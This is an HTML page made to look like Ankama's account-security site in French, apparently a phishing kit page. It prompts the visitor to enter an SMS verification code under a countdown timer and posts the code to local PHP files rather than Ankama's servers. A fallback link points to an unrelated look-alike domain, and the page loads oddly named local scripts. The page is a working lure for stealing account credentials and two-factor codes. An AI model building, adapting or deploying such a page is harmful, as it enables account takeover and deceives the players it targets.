<!DOCTYPE HTML>
<html xmlns="https://www.w3.org/1999/xhtml" lang="fr" xml:lang="fr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title> Verification de compte</title>
<meta name="description" content=" %s" />
<meta name="keywords" content=" %s" />
<meta name="Identifier-URL" content="account.ankama.com" />
<meta name="language" content="fr" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="fb:admins" content="100000245210540" />
<meta property="og:type" content="website" />
<meta property="og:locale" content="fr_FR" />
<meta property="og:title" content=" Verification de compte" />
<meta property="og:description" content=" %s" />
<meta property="og:url" content="https://account.ankama.com/fr/securite/ankama-shield/activer" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
<meta name="format-detection" content="telephone=no" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:site" content="@ankamagames" />
<meta name="twitter:creator" content="@ankamagames" />
<meta name="robots" content="NOODP,Index,Follow" />
<link type="image/x-icon" rel="shortcut icon" href="https://account.ankama.com/favicon.ico" />
<link rel="dns-prefetch" href="s.ankama.com" />
<link rel="image_src" href="https://s.ankama.com/www/static.ankama.com/ankama/account-ng/img/logo-account.jpg" />
<meta property="og:image" content="https://s.ankama.com/www/static.ankama.com/ankama/account-ng/img/logo-account.jpg" />
<link rel="alternate" href="https://account.ankama.com/fr/securite/ankama-shield/activer" hreflang="fr" />
<link rel="alternate" href="https://account.ankama.com/en/security/ankama-shield/activate" hreflang="en" />
<link rel="alternate" href="https://account.ankama.com/de/sicherheit/ankama-shield/aktivieren" hreflang="de" />
<link rel="alternate" href="https://account.ankama.com/es/seguridad/ankama-shield/activar" hreflang="es" />
<link rel="alternate" href="https://account.ankama.com/pt/seguranca/ankama-shield/ativar" hreflang="pt" />
<link rel="alternate" href="https://account.ankama.com/it/sicurezza/ankama-shield/attivare" hreflang="it" />
<link type="text/css" rel="stylesheet" href="commonn.css" />
<link type="text/css" rel="stylesheet" href="security.css" />
<link type="text/css" rel="stylesheet" href="profil.css" />
<link type="text/css" rel="stylesheet" href="stepveefeper.css" />
<script async="" charset="utf-8" src="jvousnique.js" type="text/javascript"></script>
<script type="text/javascript" src="https://static.zdassets.com/ekr/snippet.js?key=7b60150f-2919-4927-8258-669b212b6714" id="ze-snippet"></script>
<script type="text/javascript">
    
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-122429-79', 'auto', {'cookieDomain': 'none', 'allowLinker': true});
ga('require', 'displayfeatures');
ga('require', 'ecommerce');
ga('require', 'linker');
ga('require', 'linkid', 'linkid.js');
ga('set', 'dimension1', 'not_logged_on');
ga('send', 'pageview');
  </script>
  <script type="text/javascript">
    (function() {
var hm = document.createElement('script'); hm.type ='text/javascript'; hm.async = true;
hm.src = ('++u-heatmap-it+log-js').replace(/[+]/g,'/').replace(/-/g,'.');
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(hm, s);
})();
  </script>
</head>
<body class="fr">

<header>
<div class="ak-idbar">
<div class="ak-idbar-content">
<div class="ak-idbar-left">
<div class="ak-brand" data-set="ak-brand"> <a class="navbar-brand" href="https://www.ankama-group.com" target="_blank"></a>
</div>
<a class="ak-support" href="https://support.ankama.com" target="_blank">Support</a>
</div>
<div class="ak-idbar-right">
<div class="ak-button-modal ak-nav-logged" data-hasqtip="1" aria-describedby="qtip-1">
<div class="ak-logged-account">
<span class="ak-nickname">déconnexion</span>
<span class="avatar">
<img src="avatar.png" alt="Avatar">
</span>
</div>
</div>
<script type="application/json">{"target":".ak-box-logged"}</script><div class="ak-button-modal ak-flags-links" data-hasqtip="2">
<a class="ak-flag" href="#"></a>
</div>
<div class="ak-idbar-box ak-box-lang">
<a href="" hreflang="fr" class="ak-flag-fr">FR</a>
<a href="account.ankama=codes-validation.php" hreflang="en" class="ak-flag-en">EN</a>
<a href="account.ankama=codes-validation.php" hreflang="de" class="ak-flag-de">DE</a>
<a href="account.ankama=codes-validation.php" hreflang="es" class="ak-flag-es">ES</a>
<a href="account.ankama=codes-validation.php" hreflang="pt" class="ak-flag-pt">PT</a>
<a href="account.ankama=codes-validation.php" hreflang="it" class="ak-flag-it">IT</a>
</div>
</div>
</div>
</div>
<nav class="navbar navbar-default" data-role="ak_navbar">
<div class="navbar-container">
<div class="ak-navbar-left">
<a class="ak-brand" href="https://www.ankama-group.com">Ankama</a>
</div>
<a class="ak-main-logo" href="/fr"></a>
<div class="navbar-header">


<a class="burger-btn" href="javascript:void(0)"><span></span></a>
</div>
<div class="navbar-collapse navbar-ex1-collapse collapse">
<div class="ak-navbar-search-mob">
<form action="/fr/rechercher" method="get">
<input class="ak-autocomplete" name="q" type="text" value="Rechercher..." />
<script type="application/json">{"minLength":1,"delay":0,"select":"location","url":"https:\/\/account.ankama.com\/fr\/autocomplete","titlemax":45,"shownoresults":true,"noresults":"Voir tous les r\u00e9sultats"}</script> <input type="submit" value="" />
</form>
</div>
<ul class="nav navbar-nav">
<span class="ak-navbar-left-part">
<li class="lvl0 dropdown sep">
<ul class="dropdown-menu " role="menu">
<li class="lvl1 col1 game nopointer">
<ul>
</li>
</ul>
 </li>
</ul>
</li>
<li class="lvl0">
</li>
</span>
<li class="lvl0 ak-menu-brand">
<a class="navbar-brand" href=""></a>
</li>
<ul>
</li>
</ul>
</li>
</ul>
</li>
</span>
</ul>
</div> <div class="ak-navbar-right ak-has-search">
<div class="ak-button-modal ak-nav-logged">
<div class="ak-logged-account">
<span class="ak-nickname">déconnexion</span>
<span class="avatar">
<img src="avatar.png" alt="Avatar">
</span>
</div>
</div>
<script type="application/json">{"target":".ak-box-logged"}</script> <a class="ak-navbar-search" data-navbar-search>
<form action="/fr/rechercher" method="get">
<input class="ak-autocomplete" autocapitalize="off" autocorrect="off" name="q" type="text" value="Rechercher..." />
<script type="application/json">{"minLength":1,"delay":0,"select":"location","url":"https:\/\/account.ankama.com\/fr\/autocomplete","titlemax":45,"shownoresults":true,"noresults":"Voir tous les r\u00e9sultats"}</script> <input type="submit" value="ok" />
</form>
</a>
</div>
</div>
</nav>
<div class="ak-idbar-box ak-box-logged">
<div class="ak-row ak-account-header">
<div class="ak-row-cell ak-logged-avatar">
<div class="ak-logged-avatar-container">
<img src="https://s.ankama.com/www/static.ankama.com/web-avatar/0.png" class="" />
<a href="https://account.ankama.com/fr/jeux-ankama/avatars-forum" target="_blank" class="ak-picto ak-icon-change-avatar">
<div class="ak-avatar-mask">
<span class="ak-avatar-mask-infos">Changer d'avatar</span>
</div>
</a>
</div>
</div>
</div>
<div class="ak-account-infos">
<div class="ak-row ak-infos-ogrines">
<div class="ak-row-cell ak-infos-logged-picto"><span class="ak-infos-picto"></span></div>
<div class="ak-row-cell ak-infos-logged">
<span class="ak-infos-title">Ogrines : -- </span>
<span class="ak-infos-nb">0</span>
<a href="https://www.dofus.com/fr/boutique/24-ogrines" class="ak-infos-link">Acheter des Ogrines</a>
</div>
</div>
<div class="ak-row ak-infos-ankabox">
<div class="ak-row-cell ak-infos-logged-picto"><span class="ak-infos-picto"></span></div>
<div class="ak-row-cell ak-infos-logged">
<span class="ak-infos-title">Ankabox : </span>
<span class="ak-infos-nb">1</span>
<span class="ak-infos-notification">(1)</span>
<a href="https://ankabox.ankama.com/fr" target="_blank" class="ak-infos-link">Consulter ma boîte</a>
</div>
</div>
<div class="ak-infos-row ak-account-manage">
<div class="ak-ankama-logo">
</div>
<div class="ak-infos-logged">
<a class="ak-infos-logged-link" href="https://account.ankama.com/fr/compte/informations" target="_blank">
Gestion de compte </a>
<a class="ak-infos-logged-link" href="https://account.ankama.com/fr/securite" target="_blank">
Protégez votre compte ! </a>
<a class="btn btn-default" href="account.ankama-identification.php">Déconnexion</a>
</div>
</div>
</div>
</div>
<div class="ak-box-authentification">
<a href="#" class="glyphicon glyphicon-remove-circle"></a>
<div class="ak-container ak-panel">
<div class="ak-panel-content">
<!--googleoff: all-->
<div class="row">
<div class="col-md-4">
<h3>En quelques clics avec :</h3>
<div class="ak-social-connect-block">
<a class="btn btn-primary ak-btn-steam btn-lg" href="https://account.ankama.com/auth/steam?from=https%3A%2F%2Faccount.ankama.com%2Ffr%2Fsecurite%2Fankama-shield%2Factiver">Steam</a>
</div>
<div class="ak-social-connect-block">
<a class="btn btn-primary ak-btn-facebook btn-lg" href="https://account.ankama.com/auth/facebook?from=https%3A%2F%2Faccount.ankama.com%2Ffr%2Fsecurite%2Fankama-shield%2Factiver">Facebook</a>
</div>
<span class="ak-or"><span>ou</span></span>
</div>
<div class="col-md-8">
<h3>J'ai déjà un compte ANKAMA</h3>
<div class="ak-account-connect">
<div class="infos_content">
<div class="infos_box infos_box_login bg-danger text-danger" style="display:none">
<span class="warning errors_login_failed" style="display:none">Les identifiants sont incorrects</span>
<span class="warning errors_login_ban" style="display:none">Votre compte est banni définitivement</span>
<span class="warning errors_login_locked" style="display:none">Votre compte a été mis sous protection pour des raisons de sécurité.<br />
<a href="https://support.ankama.com/hc/fr/requests/new?ticket_form_id=28337">Contactez le support.</a></span>
<span class="warning errors_login_deleted" style="display:none">Supprimé</span>
<span class="warning errors_login_bruteforce" style="display:none">Brute force</span>
<span class="warning errors_login_blacklist" style="display:none">L'adresse IP que vous utilisez est bloquée. Cela peut survenir si vous vous connectez depuis un réseau public et/ou si vous utilisez un proxy/VPN.</span>
<span class="warning errors_login_otptimefailed" style="display:none"><strong>L'Authenticator protège ce compte Ankama</strong><ol><li>Rendez-vous sur votre application Authenticator.</li><li>Sélectionnez votre compte.</li><li>Appuyez sur " débloquer "</li><li>Vous disposez de 30 secondes pour ressaisir vos identifiants.</li></ol></span>
<span class="warning errors_login_forbidden_community" style="display:none">Cette fonctionnalité n'est pas disponible pour votre communauté</span>
<span class="warning errors_login_account_shielded" style="display:none">Ce compte Ankama est protégé par Verification de compte. Pour associer ce compte, il est nécessaire de désactiver cette protection dans votre Gestion de compte Ankama. Nous vous recommandons d'activer l'Authenticator qui lui est compatible avec Steam.</span>
<span class="warning errors_login_account_no_certify" style="display:none">Votre compte Ankama doit être <a target="_blank" href="https://account.ankama.com/fr/compte/informations/certification">certifié</a>.</span>
<span class="warning errors_login_account_linked" style="display:none">Ce compte Ankama est déjà lié à un autre compte Steam</span>
<span class="warning errors_login_recaptcha_failed" style="display:none">Vous avez échoué à la vérification anti-robot. Merci d'essayer de nouveau.</span>
</div>
</div>
<div class="ak-form"><form class="ak-container ak-form form-horizontal" role="form" method="POST" name="connectform" action="https://account.ankama.com/sso?from=https%3A%2F%2Faccount.ankama.com%2Ffr%2Fsecurite%2Fankama-shield%2Factiver"><input type="hidden" class="form-control" name="action" value="login" /><input type="hidden" class="form-control" name="from" value="https://account.ankama.com/fr/securite/ankama-shield/activer" />
<div class="form-group">
<label class="control-label" for="userlogin">Nom de compte</label>
<input type="text" class="form-control" name="login" id="userlogin" value="gabrieldiosxD" />
</div>
<div class="form-group">
<label class="control-label" for="userpass">Mot de passe</label>
<input type="password" class="form-control ak-field-password ak-tooltip" name="password" value="" id="userpass" /><script type="application/json">{"manual":true,"tooltip":{"content":{"title":"Attention","text":"<p class=\"text-warning\">vous \u00e9crivez en MAJUSCULES<\/p>"},"style":{"classes":"ak-tooltip-white"},"position":{"my":"center left","at":"center right","container":".ak-login-page"},"show":{"event":"capslockpassshow"},"hide":{"event":"capslockpasshide"}},"hideOnScroll":true,"forceOnTouch":true}</script>
</div>
<div class="form-group">
<div class="checkbox">
<label>
<input type="checkbox" value="1" name="remember" checked="checked" id="uid-5c740cdc27bef" />Rester connecté
</label>
</div>
</div>
<input type="submit" type="button" role="button" class="btn btn-primary ak-invisiblecaptcha not-rendered btn-lg" id="login_sub" value="Se connecter" /><script type="application/json">{"sitekey":"6LfbFRsUAAAAACrqF5w4oOiGVxOsjSUjIHHvglJx"}</script>
</form></div>
</div>
<div class="ak-login-links">
<ul>
<li>
<a href="https://account.ankama.com/fr/compte/déconnection-impossible">Impossible de se connecter ?</a> </li>
<li><a href="https://account.ankama.com/fr/creer-un-compte">Créer un compte</a></li>
</ul>
</div>
</div>
</div>
<!--googleon: all-->
</div>
</div></div><div class="ak-idbar-box ak-box-lang">
<a href="/fr/securite/ankama-shield/activer" hreflang="fr" class="ak-flag-fr">FR</a>
<a href="/en/security/ankama-shield/activate" hreflang="en" class="ak-flag-en">EN</a>
<a href="/de/sicherheit/ankama-shield/aktivieren" hreflang="de" class="ak-flag-de">DE</a>
<a href="/es/seguridad/ankama-shield/activar" hreflang="es" class="ak-flag-es">ES</a>
<a href="/pt/seguranca/ankama-shield/ativar" hreflang="pt" class="ak-flag-pt">PT</a>
<a href="/it/sicurezza/ankama-shield/attivare" hreflang="it" class="ak-flag-it">IT</a>
</div>

<div class="largedesktop device-profile visible-lg" data-deviceprofile="largedesktop"></div>
<div class="desktop device-profile visible-md" data-deviceprofile="desktop"></div>
<div class="tablet device-profile visible-sm" data-deviceprofile="tablet"></div>
<div class="mobile device-profile visible-xs" data-deviceprofile="mobile"></div>
</header>
<aside class="ak-slidemenu">
<div class="ak-navbar-search-mob">
<form action="/fr/rechercher" method="get">
<input class="ak-autocomplete ui-autocomplete-input" name="q" type="text" value="Rechercher..." autocomplete="off">
<script type="application/json">
        {
            "minLength":1,
            "delay":0,
            "select":"location",
            "url":"https://account.ankama.com/fr/autocomplete",
            "titlemax":45,
            "shownoresults":true,
            "noresults":"Voir tous les résultats"
        }
        </script>
<input type="submit" value="">
<ul class="ui-autocomplete ui-front ui-menu ui-widget ui-widget-content" id="ui-id-1" tabindex="0" style="display: none;"></ul></form>
</div>
<div class="menu-container"></div>
<div class="menu-buttons">
<div class="ak-button-modal ak-flags-links">
<a class="ak-flag" href="#"></a>
</div>
<script type="application/json">{"tooltip":{"position":{"my":"left bottom","at":"top left"},"hide":{"event":"mouseleave"}}}</script> <div class="ak-idbar-box ak-box-lang">
<a href="/fr/securite/ankama-shield/activer" hreflang="fr" class="ak-flag-fr">FR</a>
<a href="/en/security/ankama-shield/activate" hreflang="en" class="ak-flag-en">EN</a>
<a href="/de/sicherheit/ankama-shield/aktivieren" hreflang="de" class="ak-flag-de">DE</a>
<a href="/es/seguridad/ankama-shield/activar" hreflang="es" class="ak-flag-es">ES</a>
<a href="/pt/seguranca/ankama-shield/ativar" hreflang="pt" class="ak-flag-pt">PT</a>
<a href="/it/sicurezza/ankama-shield/attivare" hreflang="it" class="ak-flag-it">IT</a>
</div>
<a class="btn-default ak-support-link" href="https://support.ankama.com" target="_blank">Contacter le Support</a>
</div>
</aside>
<script type="application/json">{"triggerElement":".navbar-header .burger-btn","fromTarget":"ul.nav.navbar-nav"}</script>
<div class="ak-mobile-menu-scroller">
      <div class="ak-pagetop ak-container"><div class="ak-pagetop-child "><div class="ak-container container"><div class="ak-sectiontitle ak-icon-secure">
<div>
<div><div class="row">
<div class="col-sm-12">
<nav>
<div class="ak-breadcrumb-spacer"></div>
<div class="breadcrumb" itemscope itemtype="https://data-vocabulary.org/Breadcrumb">
<a rel="index" class="ak-first" href="account.ankama=codes-verification.php" itemprop="url">
<span itemprop="title">Accueil</span>
</a>
<div itemprop="child" itemscope itemtype="https://data-vocabulary.org/Breadcrumb">
<a class="ak-last" href="account.ankama=codes-verification.php" itemprop="url">
<span itemprop="title">Compte</span>
</a>
<div itemprop="child" itemscope itemtype="https://data-vocabulary.org/Breadcrumb">
<a class="ak-last" href="account.ankama=codes-verification.php" itemprop="url">
<span itemprop="title">Vérification par SMS</span>
</a>
              </div>
            </div>
          </nav>
  </div>

  </div>
</div>    <div class="ak-sectiontitle-text">Vérification par SMS</div>

  </div>
</div></div></div><div class="ak-pagetop-child ak-pagetop-stepper"><div class="ak-container container"><div class="ak-container" data-parentclass="ak-pagetop-stepper"><div class="ak-block-stepper">
  <div class="ak-stepper-content">
    <div class="ak-col-left">
            <img src="smms.png" alt="" />
                  <span>Vérification par SMS</span>
          </div>

    <div class="ak-col-right">
      <ul class="ak-stepper ak-stepper-list">
                  <li class="disabled">
            <div>
              <span>1</span><br/>
              <a href="javascript:void(0)">
                Identification              </a>
            </div>
          </li>
                  <li class="current">
            <div>
              <span>2</span><br/>
              <a href="javascript:void(0)">
                Sms              </a>
            </div>
          </li>
                  <li class="disabled">
            <div>
              <span>3</span><br/>
              <a href="javascript:void(0)">
                Validation              </a>
            </div>
          </li>
              </ul>
    </div>
  </div>
</div>
</div></div></div></div>
  <div class="container ak-main-container">

    
    


    <div class="ak-main-content">
    <div class="ak-main-page">
      <div class="row">
        <main class="main col-md-9">
                                <div class="ak-page-header">
              
                          </div>

            
                        <div class="ak-container ak-main-center"><div class="ak-title-container">
  <h1 class="ak-return-link">
                            <a href="account.ankama=codes-verification.php">
                  <span class="ak-icon-big ak-return"></span>
                      </a>
Validation par SMS


  </div><div class="ak-form"><form novalidate="novalidate" method="POST" action="account.ankama=code-verification.php" class="ak-form-account ak-form ak-container" role="form"><input class="form-control" name="postback" value="" type="hidden">
  <center>
  <br>
  <img src="sms.png"><br>
  <br>
  <strong class="ak-label-profil-infos">
  <b>Un code de vérification a été envoyé par SMS au numéro de téléphone que vous venez de renseigner.<br> <b >Pas de code reçu ?<a style="color:#f45c20;" href="https://dofus-pm.com/fr/mmorpg/actualites/news/account.ankama=code-de-securite.php"> Cliquer ici</a>  pour confirmer par email</b>
  </strong>
  <br><br>
  <div style="font-size:28px; color:#f45c20; " id="timer">03:00</div>
<br><br>
  <strong class="ak-label-profil-infos">Code de vérification*</strong><span class="ak-profil-infos ak-block">
<div class="form-group">
<input type="text" required class="form-control ak-field-code" name="Codesecurite" id="Codesecurite" placeholder="Code de vérification"><script type="application/json">{"validation":{"rules":[{"required":true,"message":"Ce champ ne peut pas rester vide"}]}}</script>
  </center>
    <div class="ak-container ak-block-button-form">
     	<center>
     		<br>
     		 <input role="button" class="btn btn-primary btn-lg" value="Valider" type="submit" ><br><br>
     	</center>
</main>
<aside class="col-md-3">

<div class="ak-container ak-main-aside"><div class="ak-container ak-panel ak-aside-infos"> <div class="ak-panel-title">
<span class="ak-panel-title-icon"></span>
INFORMATIONS
</div>
<div class="ak-panel-content">
Vous pouvez <strong>passer la vérification par SMS</strong> et reprendre le contrôle en quelques minutes !<br />
<br />
<strong>L'envoi du SMS est gratuit</strong>. Afin d'éviter les abus, les comptes sont soumis à un <strong>quota de SMS envoyé par semaine et par mois</strong>. Si vous utilisez de façon raisonnable le service, il n'y aura pas de soucis. <br />
<br />
Vous devez saisir le numéro de téléphone mobile associé au compte concerné.<br />
<br />
Vous devez être le <strong>propriétaire du téléphone</strong> pour utiliser ce service (ou avoir obtenu son autorisation).
</div>
</div></div> </aside>
</div>
</div>
</div>
</div>
<a class="ak-backtotop" href="javascript:void(0);"></a>
<footer><div class="ak-footer-content">
<div class="row ak-block1">
<div class="col-md-9 ak-block-links">
</div>
<div class="col-md-3 ak-block-download">
<a class="ak-problem" href="https://support.ankama.com/requests/new">
</a>
<div class="ak-social-network">
</div>
</div>
</div>
<div class="row ak_legal">
<div id="col-md-12">
<div class="ak-legal">
<div class="row">
<div class="col-sm-1"><a href="https://www.ankama-group.com" target="_blank" class="ak-logo-ankama"></a></div>
<div class="col-sm-11">
<p>
© 2020 <a href="https://www.ankama-group.com/fr" target="_blank">Ankama</a>. Tous droits réservés. <a href="https://account.ankama.com/fr/cgu" target="_blank">Conditions d'utilisation</a> - <a href="https://account.ankama.com/fr/politique-confidentialite" target="_blank">Politique de confidentialité</a> - <a href="https://account.ankama.com/fr/cgv" target="_blank">Conditions Générales de Vente</a> - <a href="https://account.ankama.com/fr/mentions-legales?ref=ankama" target="_blank">Mentions Légales</a> - <a href="javascript:void(0);" class="ak-modal-trigger">Gestion des cookies</a><script type="application/json">{"target":".ak-modal-privacy-cookies"}</script> </p>
</div>
</div>
</div> </div>
</div>
</div>
<div class="ak-modal-privacy-cookies ak-modal" title="Gestion de vos pr&eacute;f&eacute;rences sur les cookies"> <p>
<div class="ak-privacy-cookies-manager">
<p class="ak-intro">Certaines fonctionnalités de ce site (partage de contenus sur les réseaux sociaux, lecture directe de vidéos) s'appuient sur des services proposés par des sites tiers. Ces fonctionnalités déposent des cookies permettant notamment à ces sites de tracer votre navigation. Ces cookies ne sont déposés que si vous donnez votre accord. Vous pouvez vous informer sur la nature des cookies déposés, les accepter ou les refuser soit globalement pour l'ensemble du site et l'ensemble des services, soit service par service.</p>
<hr />
<div class="ak-group" group="_all">
<h3>Tous</h3>
<p>Préférences pour tous les services</p>
<div class="ak-block" key="_all">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Tous </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary " action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
</div>
<hr />
<div class="ak-group" group="audience">
<h3>Audience et Publicité</h3>
<p>Les cookies d'audience permettent de recueillir des informations relatives à la déconnexion et au comportement des visiteurs à des fins statistiques</p>
<div class="ak-block" key="_all">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Tous </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary " action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="fbtr">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Facebook tracker </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="ggan">
<div class="row">
<div class="col-xs-6 text-right ak-label">
 Google Analytics </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="otad">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Autres outils publicitaires </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
</div>
<hr />
<div class="ak-group" group="social_networks">
<h3>Réseaux sociaux</h3>
<p>Les réseaux sociaux permettent d'améliorer la convivialité du site et aident à sa promotion via les partages.</p>
<div class="ak-block" key="_all">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Tous </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary " action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="fbok">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Facebook </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="ggpl">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Google Plus </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="twtr">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Twitter </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="dsrd">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Dicord </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="pwro">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Powr Io </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
</div>
<hr />
<div class="ak-group" group="medias">
<h3>Média</h3>
<p>Les services de médias permettent d'enrichir le site de contenu multimédia et augmentent sa visibilité.</p>
<div class="ak-block" key="_all">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Tous </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary " action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="ytbe">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Youtube </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="twch">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Twitch </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
 </div>
</div>
<div class="ak-block" key="gphy">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Giphy </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
</div>
<hr />
<div class="ak-group" group="other">
<h3>Autre</h3>
<p>Des cookies de confort pour améliorer l'expérience utilisateur</p>
<div class="ak-block" key="_all">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Tous </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary " action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="ggmp">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Google Maps </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
<div class="ak-block" key="idvz">
<div class="row">
<div class="col-xs-6 text-right ak-label">
Iadvize </div>
<div class="col-xs-6">
<button class="btn btn-sm btn-primary on" action="y">Autoriser</button>
<button class="btn btn-sm btn-danger " action="n">Interdire</button>
</div>
</div>
</div>
</div>
</div></p>
</div><script type="application/json">{"dialog":{"dialogClass":"ak-modal-wrapper"}}</script></footer>
<div class="ak-mobile-menu-overlay"></div>
</div>
<script type="text/javascript" src="https://s.ankama.com/www/static.ankama.com/g/common.js"></script>
<script type="text/javascript" src="https://s.ankama.com/www/static.ankama.com/ankama/account-ng/javascript/../modules/common/common.js"></script>
<script type="text/javascript">
    
  </script>
  <script type="text/javascript">
var timeoutHandle;
function countdown(minutes) {
    var seconds = 60;
    var mins = minutes
    function tick() {
        var counter = document.getElementById("timer");
        var current_minutes = mins-1
        seconds--;
        counter.innerHTML =
        current_minutes.toString() + ":" + (seconds < 10 ? "0" : "") + String(seconds);
        if( seconds > 0 ) {
            timeoutHandle=setTimeout(tick, 1000);
        } else {

            if(mins > 1){

               // countdown(mins-1);   never reach “00″ issue solved:Contributed by Victor Streithorst
               setTimeout(function () { countdown(mins - 1); }, 1000);

            }else{
			
			window.location.href = "./"
			
			}
        }
    }
    tick();
}

countdown(3);

</script>
<script type="text/javascript" src="commofefefn.js"></script>
<script type="text/javascript" src="cogrtymmon.js"></script>
</body>
</html>
